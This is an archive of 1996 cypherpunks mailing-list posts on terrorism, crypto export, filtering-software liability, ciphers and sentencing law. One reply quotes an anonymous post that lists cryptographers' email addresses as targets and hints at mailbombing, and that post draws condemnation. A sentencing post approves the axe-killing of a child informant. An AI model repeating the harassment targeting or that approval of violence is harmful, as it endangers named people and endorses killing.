iQCVAwUBMT/FyvqHVDBboB2dAQGWbgQAlEpgHvprqslBSJLaGO4A6uk6ixAzVp9L
0FNEFlBqqnTVzLN4phPcjUb1DTPkjQqqoMDFJYD9nBGucyLWfGdvU5xxxLYD9ZAy
Qfh57JQoFeR6og9M4khYwAhic+qCXphWKegH7fIGolMi4vW8SXv+OcSbPMQqTAAk
rdGarImmTmc=
=/9/5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 11 Mar 1996 03:05:10 +0800
To: David Crookes <dave@crimbles.demon.co.uk>
Subject: TER_ror
Message-ID: <199603080259.VAA05749@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist, March 2, 1996, pp. 23-25. 
 
 
   What is terrorism? 
 
      The use of terror is more widespread and effective than 
      is generally recognised 
 
 
   June 1914: a young man in Sarajevo steps up to a carriage 
   and fires his pistol. The Archduke Eerdinand dies. Within 
   weeks, the first world war has begun. The 1940s: the French 
   resistance kill occupying troops when and how they can. 
   June 1944: at Oradour-sur-Glane, in central France, German 
   SS troops take revenge, massacring 642 villagers. August 
   1945: the United States Air Eorce drops the world's first 
   nuclear weapons. Some 190,000 Japanese die, nearly all of 
   them civilians. Within days the second world war has ended. 
 
   Which of these four events was an act of terrorism? Which 
   achieved anything? Which, if any, will history judge as 
   justified? And whose history? Terrorism is not the simple, 
   sharp-edged, bad-guy phenomenon we all love to condemn. No 
   clear line marks off politics from the threat of force, 
   threat from use, use from covert or open war. Who is or is 
   not a terrorist? The suicide bomber, the rebel guerrilla, 
   the liberation front, the armed forces of the state? 
 
   In practice, what act or person earns the label depends on 
   who wants to apply it. To Ulster loyalists all IRA violence 
   is terrorism; to Sinn Fein it is part of a legitimate 
   war.To many Israelis, everyone from the suicidebombers in 
   Jerusalem or Ashkelon to the Hizbollah grenade-thrower in 
   South Lebanon is a terrorist; to many Arabs during the 1982 
   Lebanon war, the worst terrorists in the Middle East were 
   the -- entirely legitimate, uniformed -- Israel Defence 
   Force. 
 
   If the concept is not to vanish into all-embracing fudge, 
   two distinctions can be drawn, though habitually they are 
   not. Terrorism is indeed about terror; not just violence, 
   but its use to spread terror. And the violence is aimed 
   specifically at civilians. 
 
   Classical terrorism, ideological rather than territorial, 
   reveals the niceties. Recent decades saw West Germany's 
   Baader-Meinhof gang and Red Army Faction murder prominent 
   businessmen such as Alfred Herrhausen and Jurgen Ponto 
   (bosses of Germany's two largest banks, Deutsche and 
   Dresdner respectively. Italy's Red Brigades murdered Aldo 
   Moro, a former prime minister. Its far right in 1980 blew 
   up a train in Bologna station, killing 84 people. Which of 
   these was truly terrorism? Arguably, only the last. It was 
   an act of indiscriminate violence to terrorise citizens at 
   large; the others were discriminate assassinations to win 
   publicity and display power. 
 
   Likewise, lobbing mortar-bombs into a British army base in 
   South Armagh may have deadly results, but it is guerrilla 
   warfare. Planting a bomb that kills a dozen diners in a 
   restaurant is terrorism. The suicide bomber in Jerusalem 
   was a terrorist; the Hizbollah fighter in South Lebanon 
   attacking Israeli army patrols is not. 
 
   Even in the distinction between guerrilla warfare and 
   terrorism, there are grey areas. The soldier in a tank is 
   a military target. What about one in a jeep escorting 
   civilian vehicles? Or returning on a bus from leave? A bus 
   that may -- and was, when a suicide bomber attacked it in 
   Gaza last April -- be carrying civilians too? 
 
   There are, in contrast, distinctions often made that ought 
   not to be. What is or is not "terrorism" does not depend on 
   the badness or goodness of the cause, nor on whether those 
   espousing it have the chance to express their demands 
   democratically. When President James Garfield was 
   assassinated in America in the same year, 1881, that a 
   Russian terrorist group blew up Tsar Alexander II, the 
   Russians wrote an open letter condemning Garfield's killers 
   and arguing that: 
 
      In a land where the citizens are free to express their 
      ideas, and where the will of the people does not merely 
      make the law but appoints the person who is to carry the 
      law into effect, political assassination is the 
      manifestation of despotism ... Despotism is always 
      blameworthy and force can only be justified when 
      employed to resist force. 
 
   Yet despotism does not justify throwing bombs into crowds 
   (as the group sometimes did). 
 
   The fact is that a good cause may use terrorism just as a 
   bad one may. South Africa has provided a clear example. The 
   ending of white dominance was a plainly good cause. For the 
   most part, the African National Congress used mass 
   demonstrations and industrial sabotage to advance its 
   cause. But the men who shot up a white church congregation 
   or planted a bomb outside a cinema were terrorists in the 
   purest sense of the word. 
 
   Nor does the terrorists' ultimate success or failure alter 
   the truth. Menachem Begin got to lead a country; Yasser 
   Arafat may do; Velupillai Prabhakaran, who leads the Tamil 
   Tigers, probably will not. None of that changes the fact 
   that Deir Yassin (a massacre of Palestinian villagers by 
   Israelis fighting to establish their state), the killing of 
   11 Israeli athletes at the Munich Olympics in 1972 and this 
   year's Tamil Tiger bomb in Colombo were all acts of terror. 
 
   The terror of the state 
 
   So much for the underdogs. Can there be terrorist 
   governments too? The Americans certainly think so when they 
   accuse Libya or Iran of supporting international terrorism. 
   In the cold war, international terrorists were used to wage 
   war by proxy: the East German regime provided safe houses 
   for Baaders and Meinhofs; the modern era's most notorious 
   terrorist, the gun-for-hire Carlos the Jackal, made his 
   career in this world of state-sponsored terrorism. 
 
   All that was diplomacy by terror. Can a recognised 
   government also be guilty of terrorism against its own 
   people? 
 
   Yes. Stalin used terror systematically to consolidate his 
   power -- random murders of Communist-Party members and army 
   officers in the 1930s, massacres and exiles of smaller 
   ethnic groups throughout his rule. Much of Latin America 
   practised state terrorism in recent decades. The brasshat 
   regimes of the day faced left-wing, sometimes terrorist 
   movements. Many fought back with terror. And not just 
   through paramilitaries or unacknowledged death squads. The 
   infamous massacre at El Mozote in El Salvador in 1981 was 
   the work of that country's regular army. The unit that did 
   it had a cheerful song of its own, 
 
      "Somos Guerreros": 
 
      We are warriors, 
      Warriors all! 
      We are setting out to kill 
      A mountain of terrorists. 
 
   What in fact they killed was over 500 peasants; probably 
   the worst "official" massacre in Latin America's recent 
   history. 
 
   Can regular armies, in regular war, be guilty of terrorism? 
   The answer, surely, is yes. Look at the Japanese rape of 
   Nanking in 1937, when not hundreds or thousands but ten of 
   thousands of civilians were murdered, to terrorise the rest 
   of China. Then go a step further. Can the armies of proud 
   democracies be guilty too? A century ago, the rich world, 
   with the rules of war that it claimed to use, would have 
   called attacking civilians impermissable. The modern world 
   has other ideas. The Allied bombing of Germany was aimed at 
   civilians in the hope of shattering morale: in short, 
   terror. The fire bombing of Tokyo and the atomic weapons 
   that vaporised Hiroshima and Nagasaki were arguably aimed 
   at government morale, not that of Japan's population. Their 
   victims did not notice the difference. 
 
   Who kills and how? 
 
   What use, one can ask, is a definition so wide that it can 
   go from Stalin to the American air force? There are two 
   answers. 
 
   First, it is a reminder that terrorism, historically, has 
   been the tool of the strong, not the weak. Medieval armies, 
   having taken a besieged town, would slaughter some or all 
   of the citizens to encourage other towns to surrender 
   faster. During India's struggle for independence, by far 
   the worst terror was the Amritsar massacre in 1919, when 
   British-officered troops shot up a political gathering, and 
   carried on shooting until the bullets ran out; 379 
   civilians died (and it worked: the rebellious province of 
   Punjab returned to order). In contrast, discriminate 
   assassination was the typical weapon of the 19th-century 
   anarchist and nihilist. 
 
   By and large, true random terrorism has come in the past 30 
   years, as in the Bologna train bomb, the recent nerve- 
   gassing of the Tokyo metro by a religious cult, or the 
   Oklahoma City bomb; all three crimes were aimed at no 
   matter whom for a purpose so vague or Utopian as to seem 
   irrelevant, except to the deranged. Even in this period 
   most -- not all -- IRA killing was aimed at defined 
   targets: soldiers, policemen, individual Protestant farmers 
   in border areas. The Basque violence of ETA has often 
   followed this pattern. Peru's Shining Path guerrillas are 
   truer terrorists, but even they (mostly) prefer the 
   tactics, honed by the Vietcong, of killing officials, not 
   just (as in some infamous massacres) everyone in sight. 
   Algeria's and Sri Lanka's terrorists today probably have 
   the strongest claim to be called spreaders of true random 
   terror. 
 
   The second thing one can learn from the wide definition of 
   terrorism is that the phenomenon is neither uniquely 
   wicked, nor -- still less -- uniquely deadly. People fight 
   with the weapons they have: knives, Semtex, rifles, 
   fighter-bombers. All their users are alike convinced of 
   their own righteousness, all kill and all their victims are 
   equally dead. What they are not is equal in number. The 
   Munich terrorists killed 11 Israelis; Israel's retaliation 
   against the Lebanese town of Nabatiyeh, however justified, 
   killed about 100 Arabs. The State Department has totted up 
   the deaths due to international terrorism from 1968 through 
   1995. Its total, and it defines terrorism broadly, is 
   8,700. Twenty-four hours of air raids killed six times as 
   many civilians at Dresden in 1945. One is a crime, says 
   international law, the other a legitimate act of war. 
 
   The response 
 
   Is all this mere word-play? It is not. It crucially affects 
   responses to terrorism. 
 
   One true difference between a terrorist group and a 
   government is that the group is almost impossible to smash. 
   You can destroy or seize a government's ability to make 
   conventional war; you will never get every terrorist's last 
   stick of dynamite or timing mechanism, and it requires 
   wonderfully few terrorists to keep a civilised society on 
   edge. 
 
   But many other imagined differences are less great than 
   they might appear. It is a common error to suppose that 
   because terrorism is not war, and because its weapons are 
   not the full panoply of war, then the psychology of 
   terrorists must be different too. Of course, there are 
   plenty of curious specimens among terrorism's ranks: Carlos 
   the Jackal, now in French hands, was not just any old 
   gunman; or consider Abimael Guzman, an academic who until 
   his capture in 1992 led Peru's Shining Path movement. Every 
   terrorist must have personal devotion to the cause -- he 
   is, after all, risking his liberty, and often his life; not 
   many reluctant army conscripts, drafted by a legitimate 
   government, are likely feel the same way. And plainly, say 
   those who know them, the IRA and other groups include 
   people who enjoy violence for its own sake. 
 
   But so do most armies. And most governments, once at war, 
   can produce remarkable devotion to the national cause. In 
   its own terms, a warring terrorist group, like a warring 
   government, is "pursuing diplomacy by other means", even if 
   its means of war are different. It too is subject to highs 
   and lows, to war fatigue and collapses of morale, to 
   premature celebration of a battle won as if it had been the 
   war. It too can be threatened with a heavy hand; some of 
   its members may be wooed with a lighter one. 
 
   Terrorists, like governments, may be rational: they are 
   pursuing a policy they hope will succeed. And the more it 
   works, the more vigorously they will pursue it. 
 
   It is always hard, when terrorism is just one element in a 
   complex pattern of events, to identify its impact. But the 
   world is manifestly a different place because of acts of 
   terror. In 1948, the Israelis blew up the King David hotel, 
   the administrative centre of the British rulers of 
   Palestine. The atrocity helped persuade the British to 
   leave. 
 
   Often, terrorists help advance a general cause, but not 
   their own particular aims. That may be the case with the 
   IRA. Irish Republican terrorism helped dramatise the 
   nationalist cause throughout periods of discriminatory 
   Protestant rule. And Britain has made concessions to the 
   nationalists. In the Anglo-Irish agreement of 1985, the 
   British accepted the right of the Irish Republic to a say 
   in a province of the United Kingdom; in the two 
   governments' Downing Street declaration of 1993 Britain 
   said it had "no selfish strategic or economic interest in 
   Northern Ireland". It is hard to imagine any other 
   government saying such things of its own accord. Yet 
   whether it was the IRA that brought this about, or 
   persistent pressure from the Irish government and peaceful 
   nationalists in the north, is debatable. The leader of the 
   biggest nationalist party in Northern Ireland, John Hume, 
   argues that IRA terrorism has been the main obstacle to a 
   peaceful settlement in Ulster. If so, the IRA may also have 
   harmed the nationalist cause. 
 
   And sometimes, terrorists can advance both a general cause 
   and themselves. The PLO'S campaigns in the 1970s made the 
   organisation the dominant representative of the 
   Palestinians. They also helped solidify the Palestinians' 
   own sense of their distinct identity, which until then had 
   been relatively weak. 
 
   Just as terrorists make a difference to the world, so 
   changes in the world make a difference to terrorists. It 
   was not just their own weakness that led the British to 
   quit India, or later Cyprus (whose EOKA gunmen, though 
   damned as terrorists, were more like guerrilla fighters), 
   or later still Kenya (where they faced a genuinely 
   terrorist liberation movement). Weakness played its part, 
   but so did a world view that said colonial empires had had 
   their day. Much the same was true in South Africa. F.W. de 
   Klerk, probably the last white president there, may not 
   have been a more virtuous man than the architects of 
   apartheid who preceded him. But he was and is a realist, 
   who lived in different days and under different pressures. 
 
   In that case, a just cause plainly helped the terrorists. 
   For Muslim countries the Palestinian cause was no less 
   just. Western countries, guiltily aware of the horrors of 
   Jewish history, disagreed, and it took 20 years of Israeli 
   occupation and the intifada, the Palestinian uprising of 
   1987-90, to persuade them that the PLO too had a case. It 
   is still not one that much impresses Americans; and though 
   other westerners may have sympathy with Palestinian dreams 
   of statehood, any movement that still seeks a quite 
   different thing, the destruction of Israel, on top will -- 
   very rightly -- find that its bombers face a western world 
   united behind the Jewish state. 
 
   Like the rest of us -- mostly 
 
   In all this, what is different about dealing with 
   terrorism? The answer, perhaps unsurprisingly, is not very 
   much. 
 
   Any government has its own interests, its own pressures, 
   its concessions it can make and those it cannot. It fights 
   its conventional wars with tanks and aircraft, its 
   small-scale wars -- partly terrorist, mostly not -- with 
   intelligence men and small arms. It cannot, usually, zap 
   the terrorists' territory as it could that of a hostile 
   state. But its psychology will be much the same in the two 
   cases -- and so will that of its enemies. The terrorist or 
   suicide bomber or gunman or fighter or liberation hero is 
   not different from other men (men, sic; rarely have women 
   played any notable part, any more than they have in 
   old-fashioned war). 
 
   With one notable exception: the nutters, whether with a 
   cause or no evident cause at all. The American way-out 
   redneck who thinks he has to plant a bomb, when he could 
   vote for Pat Buchanan, is beyond any but a psychiatrist's 
   reach. So too elitist solipsists like the Baader-Meinhof 
   mob, convinced that murder was justified because they knew 
   all the answers and it was society that was out of step. 
   Among the almost causeless, Italy's far right may have 
   sought instability, but for what? That was never clear. And 
   no known concession could have led Japan's Aum Shinrikyo 
   cult to put aside its chemistry set. 
 
   Is it coincidence that three of these four groups seem to 
   specialise in the true terrorism, the random murder of 
   civilians for terror's sake? Perhaps it is not. 
 
   [End] 
 
   This special essay is from an issue of The Economist that 
   also writes on "in the mind of the terrorist," "a new plan 
   for Ulster" and "Israel, Palestine and Hamas." 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Mon, 11 Mar 1996 02:55:49 +0800
To: cypherpunks@toad.com
Subject: Infosecurity News blurb on Notes
Message-ID: <Pine.BSD/.3.91.960307221457.27289A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the March/April 1996 issue.

Lotus accepts escrow
      
In a compromise to obtain export permission, Lotus Development Copr. has 
agreed to escrow 24 bits of the 64-bit encryption keys used in the new 
release of Lotus Notes.  The U.S. government allows export of unescrowed 
40-bit key strings.

Under the Lotus plan, U.S. agents will be able to access the escrowed 
portion of the key but would still have to decrypt the rest to obtain a 
clear-text message.  Althought the NSA has not said it can decrypt 
40-bit DES encryption, many postuylate that it can.

[end excerpt]

Postulate??? And I thought Notes used RC4?  Pretty bad for a security 
journal.
      

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 19:08:19 +0800
To: cypherpunks@toad.com
Subject: Vexatious Litigants  (was: SurfWatch)
Message-ID: <ad64fc0f01021004bf2a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM 3/8/96, Bill Frantz wrote:
>At  6:59 PM 3/7/96 -0800, Timothy C. May wrote:
>>If SurfWatch can be sued for a "bad review," then Siskel and Ebert had
>>better find a new line of work.
>
>As long as a reviewer corrects errors, as SurfWatch seems to be willing to
>do, I think they are relativly suit-proof.  If they don't, well - anyone
>can be sued for anything.  I'll let the lawyers comment on the possibility
>of success.

OK, OK, I did not stick enough qualifiers in my "If SurfWatch can be sued"
point. I should have said, in gory detail, "If SurfWatch can be
successfully sued and found liable," etc.

It is true that "anyone can be sued for anything" in these BS. I can sue
Bill for writing the post he wrote.

However, such a suit would definitely never reach trial.

My point was that "opinions" (such as movie reviews) are not "tortable"
(don't know the legal name), unless specific inaccuracies can be
demonstrated, and even then it is hard. Siskel and Ebert have undoubtedly
destroyed the box office prospects of many a movie with their "thumbs down"
diss of death, but I know of no successful (or even adjudicated) lawsuits
on this basis.

One of the few cases of a reviewer being successfully sued involved the
Bose Corporation, maker of the once-trendy Bose 901 speakers. It seems that
around 1970 or so, at the height of popularity of the 901s, one of the
stereo mags, or maybe it was "Consumer Reports," ran a review of the 901s
and (correctly) criticized them as being not worth the high price (and
maybe a comment that Bose's "direct-reflecting" snake oil was just that).

Bose sued, and the case dragged on for many years. I think Bose eventually
won. Too bad.

Opinions are opinions, and a free society has no business suppressing
opinions by use of torts. (Another related area is the use of torts to halt
public comment on controversial development plans. These are called "SLAPP"
suits--"Strategic Lawsuits Against Public Participation." For example,
where AT&T sues "the Cypherpunks" to shut them up about their anti-Clipper
feelings. Some judges are awarding large damages to the groups hit with the
SLAPP suits.)

So, while it is technically true that "anyone can sue anyone else," having
the case get to trial is a different thing. And the law actually means what
it says, in some cases. The First Amendment, for example, will stop Bill
from successfully suing me because he dislikes my use of the word
"tortable." If he files some number of these frivolous suits, he may find
himself on a list of "vexatious litigants" (one of my favorite phrases of
all time!).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Hallgren <astro@clover.cleaf.com>
Date: Fri, 8 Mar 1996 15:32:25 +0800
To: "'cypherpunks@toad.com>
Subject: Life, The Universe, and Everything
Message-ID: <01BB0C76.5FEC0C40@dial4txk.cleaf.com>
MIME-Version: 1.0
Content-Type: text/plain


hey... everyone else has decided to annoy me with their test messages, so I have decided to hop on the annoy the hell out of everyone bandwagon.  yah, i know this is gonna make it to the real world, but what do you think of my signature?  it was lined up on the note pad but it looks like crap in MS Exchange (but then again so do all of yours.. hehe).


1/21/21/21/2ÅÅÅÅ1/21/21/21/2ÅÅÅÅ1/21/21/21/21/21/21/21/21/2ÅÅÅÅ1/21/21/21/2ÅÅÅÅ1/21/21/21/2
¤ Tom Hallgren, freelance misanthrope   ¤ 
¤	     (903)792-9836              ¤
¤       astro@clover.cleaf.com	        ¤
¤"All men are intrinsical rascals, and I¤
¤ am only sorry that not being a dog I  ¤
¤         can't bite them."             ¤
¤           --Lord Byron                ¤
ÅÅÅÅ1/21/21/21/2ÅÅÅÅ1/21/21/21/2ÅÅÅÅÅÅÅÅÅ1/21/21/21/2ÅÅÅÅ1/21/21/21/2ÅÅÅÅ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 8 Mar 1996 17:55:30 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <199603080708.XAA25178@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 3/7/96 -0800, Timothy C. May wrote:
>My point was that "opinions" (such as movie reviews) are not "tortable"
>(don't know the legal name), unless specific inaccuracies can be
>demonstrated, and even then it is hard. Siskel and Ebert have undoubtedly
>destroyed the box office prospects of many a movie with their "thumbs down"
>diss of death, but I know of no successful (or even adjudicated) lawsuits
>on this basis.

I agree fully so far.  However, when your TimWatch software takes action
based on your opinions, you may have crossed the line between speech and
action.  Since you made the decision, rather than just provided an opinion,
you might, in our current legal climate, have caused a tort.

It would be interesting to see if a HIV positive teen could sue SurfWatch
because it blocked him from getting information on safe sex.

IMO our society has tilted too far away from caveat emptor toward "it's
someone else's fault".  People who let a machine censor their data deserve
what they get.  Parents who consistantly hide reality from their children,
instead of helping them learn how to deal with it, are crippling their
children.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 11 Mar 1996 00:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: Not a good idea...
In-Reply-To: <ad64cd0400021004b12d@[205.199.118.202]>
Message-ID: <199603080546.XAA00397@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> If SurfWatch can be sued for a "bad review," then Siskel and Ebert had
> better find a new line of work.

I might be stretching things a bit, but couldn't you call a CA a "review 
service"?  Essentially instead of having a banned list, you have an 
"accepted list".

Right now, CAs seem to be all using the same narrow critera for putting 
someone on the accepted list -- knowledge about the identity of someone 
running the site.

If CAs are liable, then why not SurfWatch?  Or better yet, if SurfWatch 
isn't liable, then why should a CA be?

The problem of liability is a real one, at least with a protocol like
X.509.  Sites need to have certs to interoperate with the rest of the
world, and CAs seem to expose themselves to liability by issuing certs. 
That means that certs are going to cost money, or at least more than they
would otherwise.  And that could have a chilling effect on the widespread
deployment of crypto.

As was recently pointed out in another context, security is economics, 
and anything that adds cost to security means less security for 
everyone.  I think in general we ought to oppose laws which expand 
liability for things people do online;  liability can almost be viewed as 
another form of regulation.  A judgment against a tobacco company would 
probably have the same effect as an outight ban on cigarettes.

What's more, protocols which force authentiion on people who might only
want or need encryption aren't good.  With liability figured in
authentication costs a lot more money than basic encryption.  Say what 
you want about patents, the other main hurdle standing between us and 
really free crypto, but if we're willing to wait, they'll go away.

Our goal ought to be totally free access to crypto tools without legal
interferrence, cost (even for commercial applications), incompatibility
with dominant standards, or risk of liability. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 9 Mar 1996 23:27:36 +0800
To: cypherpunks@toad.com
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <Pine.SUN.3.91.960305012339.25225A-100000@eskimo.com>
Message-ID: <313dc864.7818147@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 05 Mar 1996 01:27:24 -0800 (PST), Wei Dai wrote:

> On Mon, 4 Mar 1996, Christopher Allen wrote:
> 
> > At 4:27 PM 1/27/96, Anonymous wrote:
> > >Anybody have info on the SEAL cipher?  I can't find any
> > >descriptions or analysis of it.  Refs, proceedings or URLS
> > >would be a good thing.
> > 
> > I also am interested in references to it.
> 
> I believe it was presented at the first Cambridge security workshop on 
> fast software encryption.

Correct.  The paper is "A Software Optimized Encryption Algorithm", by
Phillip Rogaway and Don Coppersmith, pp 56-63 of the proceedings.

It is a fast stream cipher.  The paper reports encryption rates of 7.2
MBytes/Second on a 486-50. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Mar 1996 16:37:53 +0800
To: cypherpunks@toad.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
In-Reply-To: <199603080239.SAA00668@jobe.shell.portal.com>
Message-ID: <199603080543.AAA12484@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



We can understand why it is that you would want to remain anonymous,
as the embarassment of being associated with your ideas is probably
too much to bear....

anonymous-remailer@shell.portal.com writes:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> 
> I wish to point out that some of these people are just probably misguided
> and should be educated not hurt. A full mail spool is educatio[nal but
> but it would IMHO be wrong to do mailbombing the postmaster or hacking
> their accts etc. Give them a chance.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 8 Mar 1996 17:31:33 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
Message-ID: <2.2.32.19960307184349.006816e8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:05 PM 03/7/96 -0800, you wrote:
>This is the first in a regular series of postings of cypherpunks
>who have joined big brothers fight to deprive you from Unescrowed
>Crypto.

... <fascist bullshit deleted> ...

A: Who fucking died and made you God?

B: Give it a rest. You're getting annoying.

C: Fuck off. I decide for myself what the 'value' of these people is in my life. As it stands right now, their horsepower rates higher than yours by a factor of about a billion to one.

My apologies to the CP list for this - lots of late nights and little sleep tend to make me less tolerant of bullshit than usual.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT8RpMVrTvyYOzAZAQH4kAQAh4w6YEknXtc/yWHRfh+l1lUdvZKgKswh
EX3EMhI4b5A5JB9zRDCG0GbnzqA4UHANQOvtDqSKvOnCvDsMOqo0cUv9QxWyes2x
v0ElHSXxuuIeMX1vsM0oJbFlfEiXjU0/KMcKUOppQFvpJ7+xzV9Ag/PD3FGTsCrP
VYdvI9/86Ns=
=F0Da
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiz <wiz@c2.org>
Date: Sat, 9 Mar 1996 19:32:34 +0800
To: cypherpunks@toad.com
Subject: Java and PGP
Message-ID: <199603080846.AAA23594@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


With all the current discussion on Java encryption api's, it got me thinking.
 
Would it be possible to write a Java applet that provides secure email?
By secure, I mean that nobody but the intended recipient of a letter can
read it. And that the reader knows who wrote it. That is, encryption and
signing a la PGP.
 
Using https you would download a Java applet from your mail server. Https
is needed so that a MITM can not give you a fake applet. The applet will
fetch your secring.pgp from the mail server. It will fetch your mail by
POP3 from same server and decrypt any PGP mail using the pass phrase you
enter in the applet window.
 
Problem with this setup, your mail server administrator could give you
a fake applet that sends your pass phrase back to him. That means that the
applet must be verified anyhow, so maybe https doesn't really help.
 
Anybody see a solution to this? If the applet viewer (such as Netscape 2.0)
would show an MD5 sum of the applet, we could verify that with a third party.
But it should be done automatically, like the way Netscape verifys https.

<wiz@c2.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tj_lists@prado.com
Date: Mon, 11 Mar 1996 00:19:38 +0800
To: Deranged Mutant <WlkngOwl@UNiX.asb.com>
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guidelines)
Message-ID: <199603080654.WAA21592@zoe.prado.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Deranged Mutant <WlkngOwl@UNiX.asb.com> 03/07/96  7:06pm +0000

> Yes and no. Depends on the judge.  Some are hard-assed about granting  
> waivers, others aren't.  Part of the problerm is that judges have too  
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^         
> much discretion.
^^^^^^^^^^^^^^^^^

Couldn't help noticing this, presume you mean Federal Judges since the
waiver would be from aspects of GCA 1968, a Federal law. The fact is, at
least in sentencing, Federal Judges now have very little discretion. The
Federal Sentencing Guideline structure established in the 1980's provides
"guidelines" for a given defendant convicted of a given set of charges. Things
like prior offenses add "points", ratting on your friends takes away "points".
In this case less is better than more. Anyway, a low level bureaucrat fills
out a presentence investigation report on the basis of complicated, arcane
rules it is easy to get wrong. This report goes to the judge who can pass
sentence only within a narrow range, say 6 months 1 way or the other on a
5 year sentence (very few new Federal "crimes" carry less than this). Any
departure from this range, either upward or downward, must be justified in a
formal opinion, & can be appealed by either party. Very few judges bother.
This system is cookie cutter in-justice at it's finest, & only a lack of
bureaucratic imagination has prevented it from being computerized beyond the
use of word processors to write the report.

Since well over 90% of Federal Criminal cases end in guilty pleas, this method
has the effect of transferring discretion that formerly belonged to the judge to
the prosecutor, who gets to pick from a variety of charges covering the same offense,
and the low level flunkey who gets to fill out the forms. This is exactly the big  
problem with the new "crime" of using encryption in a felony in the Leahy bill.  
Assuming for a moment this new law is tailored very narrowly & is only used on people  
who
1. Commit without governmental entrapment an underlying felony.
2. Exclusively use encrypted traffic in direct furtherance of the underlying felony,
(example: murder for hire is negotiated via encrypted messages)
there still remains the fact that this is simply another tool of prosecutorial  
discretion, of which there is way to much already. The problem with prosecutorial  
discretion is that it is always used to encourage snitching, turning this country
into a nation of Pavel Mozorov's (12 year old Hero of the Soviet Union who ratted out  
his parents to the Cheka for concealing a pig from collectivization. His uncles did as  
should be done in such cases & cut him up with an axe).

However, I do agree that in setting conditions other than fines & prison time, Federal  
Judges do have too much discretion. Chris Lambert (mthreat, Minor Threat) a 21 year old
Austin cracker now doing time in Bastrop FCI, as part of his sentence is forbidden to  
own or work with any computer w/ modem or network card/connection. This of course is to  
apply after he gets out. Traditionally, counterfeiters, who come from the ranks of  
printers, merely have to report to their parole officer & get his ok in order to own or  
go to work for a print shop.    

 



cc: cypherpunks@toad.com
    mthreat@paranoia.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Mar 1996 19:31:05 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Square pegs in round holes, matchmaking, corporate mailservers
Message-ID: <199603080906.BAA23766@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 AM 3/7/96 -0800, Hal Finney wrote:
>I don't think this satisfies the requirements.  Once Bob calculates H'
>and sees that it matches H, he knows that Alice likes him, but Alice
>doesn't know that he likes her.  The whole point of the protocol was to
>be fair.  Bob must only learn that Alice likes him if Alice is guaranteed
>to learn that he likes her.

Hmmm, you're right - Bob still has the choice at the end to reveal or
